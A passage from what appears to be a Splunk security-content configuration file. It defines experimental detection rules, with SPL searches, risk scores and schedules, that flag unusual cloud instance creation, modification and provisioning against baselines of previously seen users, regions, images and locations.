All_Changes.vendor_region | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_compute_creations_by_user user as user OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenUser=min(firstTimeSeen) | where isnull(firstTimeSeenUser) OR firstTimeSeenUser > relative_time(now(), "-24h@h") | table firstTime, user, dest, count vendor_region | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_by_previously_unseen_user_filter` [ESCU - Cloud Compute Instance Created In Previously Unused Region - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks at cloud-infrastructure events where an instance is created in any region within the last hour and then compares it to a lookup file of previously seen regions where instances have been created. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search looks at cloud-infrastructure events where an instance is created in any region within the last hour and then compares it to a lookup file of previously seen regions where instances have been created. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Regions - Initial` to build the initial table of images observed and times. You must also enable the second baseline search `Previously Seen Cloud Regions - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `cloud_compute_instance_created_in_previously_unused_region_filter` macro. action.escu.known_false_positives = It's possible that a user has unknowingly started an instance in a new region. Please verify that this activity is legitimate. action.escu.creation_date = 2020-09-02 action.escu.modification_date = 2020-09-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Compute Instance Created In Previously Unused Region - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Cloud Cryptomining"] action.risk = 1 action.risk.param._risk_message = User $user$ is creating an instance $dest$ in a new region for the first time action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 42}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Cloud Compute Instance Created In Previously Unused Region - Rule action.correlationsearch.annotations = {"analytic_story": ["Cloud Cryptomining"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime latest(_time) as lastTime values(All_Changes.object_id) as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.vendor_region, All_Changes.user | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_regions vendor_region as vendor_region OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenRegion=min(firstTimeSeen) | where isnull(firstTimeSeenRegion) OR firstTimeSeenRegion > relative_time(now(), "-24h@h") | table firstTime, user, dest, count , vendor_region | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_in_previously_unused_region_filter` [ESCU - Cloud Compute Instance Created With Previously Unseen Image - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects potential instances that are created in a cloud computing environment using new or unknown image IDs that have not been seen before. This detection is important because it helps to investigate and take appropriate action to prevent further damage or unauthorized access to the Cloud environment, which can include data breaches, unauthorized access to sensitive information, or the deployment of malicious payloads within the cloud environment. False positives might occur since legitimate instances can also have previously unseen image IDs. Next steps include conducting an extensive triage and investigation to determine the nature of the activity. During triage, review the details of the created instances, including the user responsible for the creation, the image ID used, and any associated metadata. Additionally, consider inspecting any relevant on-disk artifacts and analyzing concurrent processes to identify the source of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic detects potential instances that are created in a cloud computing environment using new or unknown image IDs that have not been seen before. This detection is important because it helps to investigate and take appropriate action to prevent further damage or unauthorized access to the Cloud environment, which can include data breaches, unauthorized access to sensitive information, or the deployment of malicious payloads within the cloud environment. False positives might occur since legitimate instances can also have previously unseen image IDs. Next steps include conducting an extensive triage and investigation to determine the nature of the activity. During triage, review the details of the created instances, including the user responsible for the creation, the image ID used, and any associated metadata. Additionally, consider inspecting any relevant on-disk artifacts and analyzing concurrent processes to identify the source of the attack. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Compute Images - Initial` to build the initial table of images observed and times. You must also enable the second baseline search `Previously Seen Cloud Compute Images - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `cloud_compute_instance_created_with_previously_unseen_image_filter` macro. action.escu.known_false_positives = After a new image is created, the first systems created with that image will cause this alert to fire. Verify that the image being used was created by a legitimate user. action.escu.creation_date = 2018-10-12 action.escu.modification_date = 2018-10-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Compute Instance Created With Previously Unseen Image - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Cloud Cryptomining"] action.risk = 1 action.risk.param._risk_message = User $user$ is creating an instance $dest$ with an image that has not been previously seen. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Cloud Compute Instance Created With Previously Unseen Image - Rule action.correlationsearch.annotations = {"analytic_story": ["Cloud Cryptomining"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id) as dest from datamodel=Change where All_Changes.action=created by All_Changes.Instance_Changes.image_id, All_Changes.user | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Instance_Changes")` | where image_id != "unknown" | lookup previously_seen_cloud_compute_images image_id as image_id OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenImage=min(firstTimeSeen) | where isnull(firstTimeSeenImage) OR firstTimeSeenImage > relative_time(now(), "-24h@h") | table firstTime, user, image_id, count, dest | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_with_previously_unseen_image_filter` [ESCU - Cloud Compute Instance Created With Previously Unseen Instance Type - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects the creation of EC2 instances with previously unseen instance types. The detection is made by using a Splunk query to identify the EC2 instances. First, the query searches for changes in the EC2 instance creation action and filters for instances with instance types that are not recognized or previously seen. Next, the query uses the Splunk tstats command to gather the necessary information from the Change data model. Then, it filters the instances with unknown instance types and reviews previously seen instance types to determine if they are new or not. The detection is important because it identifies attackers attempting to create instances with unknown or potentially compromised instance types, which can be an attempt to gain unauthorized access to sensitive data, compromise of systems, exfiltrate data, potential disruption of services, or launch other malicious activities within the environment. False positives might occur since there might be legitimate reasons for creating instances with previously unseen instance types. Therefore, you must carefully review and triage all alerts. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic detects the creation of EC2 instances with previously unseen instance types. The detection is made by using a Splunk query to identify the EC2 instances. First, the query searches for changes in the EC2 instance creation action and filters for instances with instance types that are not recognized or previously seen. Next, the query uses the Splunk tstats command to gather the necessary information from the Change data model. Then, it filters the instances with unknown instance types and reviews previously seen instance types to determine if they are new or not. The detection is important because it identifies attackers attempting to create instances with unknown or potentially compromised instance types, which can be an attempt to gain unauthorized access to sensitive data, compromise of systems, exfiltrate data, potential disruption of services, or launch other malicious activities within the environment. False positives might occur since there might be legitimate reasons for creating instances with previously unseen instance types. Therefore, you must carefully review and triage all alerts. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Compute Instance Types - Initial` to build the initial table of instance types observed and times. You must also enable the second baseline search `Previously Seen Cloud Compute Instance Types - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `cloud_compute_instance_created_with_previously_unseen_instance_type_filter` macro. action.escu.known_false_positives = It is possible that an admin will create a new system using a new instance type that has never been used before. Verify with the creator that they intended to create the system with the new instance type. action.escu.creation_date = 2020-09-12 action.escu.modification_date = 2020-09-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Compute Instance Created With Previously Unseen Instance Type - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Cloud Cryptomining"] action.risk = 1 action.risk.param._risk_message = User $user$ is creating an instance $dest$ with an instance type $instance_type$ that has not been previously seen. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Cloud Compute Instance Created With Previously Unseen Instance Type - Rule action.correlationsearch.annotations = {"analytic_story": ["Cloud Cryptomining"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id) as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.Instance_Changes.instance_type, All_Changes.user | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Instance_Changes")` | where instance_type != "unknown" | lookup previously_seen_cloud_compute_instance_types instance_type as instance_type OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenInstanceType=min(firstTimeSeen) | where isnull(firstTimeSeenInstanceType) OR firstTimeSeenInstanceType > relative_time(now(), "-24h@h") | table firstTime, user, dest, count, instance_type | `security_content_ctime(firstTime)` | `cloud_compute_instance_created_with_previously_unseen_instance_type_filter` [ESCU - Cloud Instance Modified By Previously Unseen User - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for cloud instances being modified by users who have not previously modified them. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search looks for cloud instances being modified by users who have not previously modified them. action.escu.how_to_implement = This search has a dependency on other searches to create and update a baseline of users observed to be associated with this activity. The search "Previously Seen Cloud Instance Modifications By User - Update" should be enabled for this detection to properly work. action.escu.known_false_positives = It's possible that a new user will start to modify EC2 instances when they haven't before for any number of reasons. Verify with the user that is modifying instances that this is the intended behavior. action.escu.creation_date = 2020-07-29 action.escu.modification_date = 2020-07-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Instance Modified By Previously Unseen User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Instance Activities"] action.risk = 1 action.risk.param._risk_message = User $user$ is modifying an instance $object_id$ for the first time. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Cloud Instance Modified By Previously Unseen User - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Instance Activities"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id) as object_id values(All_Changes.command) as command from datamodel=Change where All_Changes.action=modified All_Changes.change_type=EC2 All_Changes.status=success by All_Changes.user | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_instance_modifications_by_user user as user OUTPUTNEW firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenUser=min(firstTimeSeen) | where isnull(firstTimeSeenUser) OR firstTimeSeenUser > relative_time(now(), "-24h@h") | table firstTime user command object_id count | `security_content_ctime(firstTime)` | `cloud_instance_modified_by_previously_unseen_user_filter` [ESCU - Cloud Provisioning Activity From Previously Unseen City - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for cloud provisioning activities from previously unseen cities. Provisioning activities are defined broadly as any event that runs or creates something. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search looks for cloud provisioning activities from previously unseen cities. Provisioning activities are defined broadly as any event that runs or creates something. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_city_filter` macro. action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\ This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you. action.escu.creation_date = 2020-10-09 action.escu.modification_date = 2020-10-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Provisioning Activity From Previously Unseen City - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Provisioning Activities"] action.risk = 1 action.risk.param._risk_message = User $user$ is starting or creating an instance $object$ for the first time in City $City$ from IP address $src$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 18}, {"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "object", "risk_object_type": "system", "risk_score": 18}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cloud Provisioning Activity From Previously Unseen City - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.object, All_Changes.command | `drop_dm_object_name("All_Changes")` | iplocation src | where isnotnull(City) | lookup previously_seen_cloud_provisioning_activity_sources City as City OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenCity=min(firstTimeSeen) | where isnull(firstTimeSeenCity) OR firstTimeSeenCity > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, City, user, object, command | `cloud_provisioning_activity_from_previously_unseen_city_filter` | `security_content_ctime(firstTime)` [ESCU - Cloud Provisioning Activity From Previously Unseen Country - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for cloud provisioning activities from previously unseen countries. Provisioning activities are defined broadly as any event that runs or creates something. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search looks for cloud provisioning activities from previously unseen countries. Provisioning activities are defined broadly as any event that runs or creates something. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_country_filter` macro. action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\ This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you. action.escu.creation_date = 2020-10-09 action.escu.modification_date = 2020-10-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Provisioning Activity From Previously Unseen Country - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Provisioning Activities"] action.risk = 1 action.risk.param._risk_message = User $user$ is starting or creating an instance $object$ for the first time in Country $Country$ from IP address $src$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 42}, {"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "object", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cloud Provisioning Activity From Previously Unseen Country - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.object, All_Changes.command | `drop_dm_object_name("All_Changes")` | iplocation src | where isnotnull(Country) | lookup previously_seen_cloud_provisioning_activity_sources Country as Country OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenCountry=min(firstTimeSeen) | where isnull(firstTimeSeenCountry) OR firstTimeSeenCountry > relative_time(now(), "-24h@h") | table firstTime, src, Country, user, object, command | `cloud_provisioning_activity_from_previously_unseen_country_filter` | `security_content_ctime(firstTime)` [ESCU - Cloud Provisioning Activity From Previously Unseen IP Address - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for cloud provisioning activities from previously unseen IP addresses. Provisioning activities are defined broadly as any event that runs or creates something. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search looks for cloud provisioning activities from previously unseen IP addresses. Provisioning activities are defined broadly as any event that runs or creates something. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_ip_address_filter` macro. action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\ This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you. action.escu.creation_date = 2020-08-16 action.escu.modification_date = 2020-08-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Provisioning Activity From Previously Unseen IP Address - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Provisioning Activities"] action.risk = 1 action.risk.param._risk_message = User $user$ is starting or creating an instance $object_id$ for the first time from IP address $src$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 42}, {"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "object_id", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cloud Provisioning Activity From Previously Unseen IP Address - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime, latest(_time) as lastTime, values(All_Changes.object_id) as object_id from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.command | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_provisioning_activity_sources src as src OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenSrc=min(firstTimeSeen) | where isnull(firstTimeSeenSrc) OR firstTimeSeenSrc > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, user, object_id, command | `cloud_provisioning_activity_from_previously_unseen_ip_address_filter` | `security_content_ctime(firstTime)` [ESCU - Cloud Provisioning Activity From Previously Unseen Region - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for cloud provisioning activities from previously unseen regions. Provisioning activities are defined broadly as any event that runs or creates something. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search looks for cloud provisioning activities from previously unseen regions. Provisioning activities are defined broadly as any event that runs or creates something. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud Provisioning Activity Sources - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen Cloud Provisioning Activity Sources - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `previously_unseen_cloud_provisioning_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_provisioning_activity_from_previously_unseen_region_filter` macro. action.escu.known_false_positives = This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\ This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you. action.escu.creation_date = 2020-08-16 action.escu.modification_date = 2020-08-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Provisioning Activity From Previously Unseen Region - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Provisioning Activities"] action.risk = 1 action.risk.param._risk_message = User $user$ is starting or creating an instance $object$ for the first time in region $Region$ from IP address $src$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 42}, {"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "object", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cloud Provisioning Activity From Previously Unseen Region - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Provisioning Activities"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success by All_Changes.src, All_Changes.user, All_Changes.object, All_Changes.command | `drop_dm_object_name("All_Changes")` | iplocation src | where isnotnull(Region) | lookup previously_seen_cloud_provisioning_activity_sources Region as Region OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenRegion=min(firstTimeSeen) | where isnull(firstTimeSeenRegion) OR firstTimeSeenRegion > relative_time(now(), `previously_unseen_cloud_provisioning_activity_window`) | table firstTime, src, Region, user, object, command | `cloud_provisioning_activity_from_previously_unseen_region_filter` | `security_content_ctime(firstTime)` [ESCU - Cloud Security Groups Modifications by User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies users who are unsually modifying security group in your cloud enriovnment,focusing on actions such as modifications, deletions, or creations performed by users over 30-minute intervals. Analyzing patterns of modifications to security groups can help in identifying anomalous behavior that may indicate a compromised account or an insider threat.\ The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number of users. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\ This detection will only trigger on all user and service accounts that have created/modified/deleted a security group .\ The analytics returned fields allow analysts to investigate the event further by providing fields like source ip and values of the security objects affected. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1578.005"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic identifies users who are unsually modifying security group in your cloud enriovnment,focusing on actions such as modifications, deletions, or creations performed by users over 30-minute intervals. Analyzing patterns of modifications to security groups can help in identifying anomalous behavior that may indicate a compromised account or an insider threat.\ The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number of users. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\ This detection will only trigger on all 